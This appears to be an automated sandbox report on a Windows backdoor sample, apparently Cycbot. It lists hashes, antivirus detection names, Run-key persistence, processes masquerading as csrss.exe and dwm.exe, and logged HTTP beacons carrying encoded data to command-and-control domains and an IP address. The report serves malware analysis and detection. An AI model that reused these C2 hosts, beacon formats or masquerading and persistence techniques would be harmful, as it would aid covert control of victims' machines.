Analysis Date: 2014-08-18 19:25:06
MD5: bbbc5c0703c2486161f6dd1b39a96f8a
SHA1: a213dd14312c0f88a84597214b14607e29666d02

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: aec0dfa559dfbaf8943b868b7a945f54 sha1: 2f943354c7ae2c87150a5215f26512d3cad23da1 size: 112128
Section: .rdata md5: ca1c2483f4251d79514b8a9704ca62a9 sha1: b5ff276461b36ca11f51d106a82cc41c32b20adf size: 1024
Section: .data md5: 0e2c4f975877e377410c20674ede2992 sha1: c9e49f17d9e220c45478ff892bfc7285852aef39 size: 65536
Section: .reloc md5: 6c049ccde09ec50966650baf76f3152b sha1: cc08eb61aa6977458d72a3143363a529f8822df5 size: 1024
Timestamp: 2005-09-04 09:12:58
PEhash: 29b187b45952a97b7bb54733bd07f5c62bdbbb53
IMPhash: 62022e4720e987339d9fc03f1547b7c4
AV: 360 Safe: Gen:Heur.Conjar.5
AV: Ad-Aware: Gen:Heur.Conjar.5
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): no_virus
AV: Authentium: W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir): TR/Crypt.ZPACK.Gen
AV: CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Win.Trojan.Cycbot-1508
AV: Dr. Web: BackDoor.Gbot.69
AV: Emsisoft: Gen:Heur.Conjar.5
AV: Eset (nod32): Win32/Kryptik.TFW
AV: Fortinet: W32/Kryptik.SMY!tr.bdr
AV: Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV: F-Secure: Rogue:W32/OpenCloud.A
AV: Grisoft (avg): Win32/Cryptor
AV: Ikarus: Backdoor.Win32.Cycbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Generic
AV: MalwareBytes: Backdoor.Bot
AV: Mcafee: BackDoor-EXI.gen.n
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Heur.Conjar.5
AV: Norman: win32/Gbot.AX
AV: Rising: Backdoor.Win32.Cycbot.a
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Trojan.Gen.2
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): BScope.DeadCryptor.01597
AV: Yara APT: no_virus
AV: Zillya!: Trojan.Jorik.Win32.17115

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: greenherbalteaonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: yourmediaresources.com
Winsock DNS: yourblogresources.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\65e7_appcompat.txt
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\2e1d_appcompat.txt
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\system32\drwtsn32 -p 112 -e 152 -g
Creates Process: C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 196

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 112 -e 152 -g

Network Details:

DNS: greenherbalteaonline.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: onlinesearchdb.com
Type: A
DNS: yourblogresources.com
Type: A
DNS: yourmediaresources.com
Type: A
HTTP GET: http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v22=34&tq=gHZutDyMv5rJejPia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2Bsq9Sr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80

Raw Pcap

Strings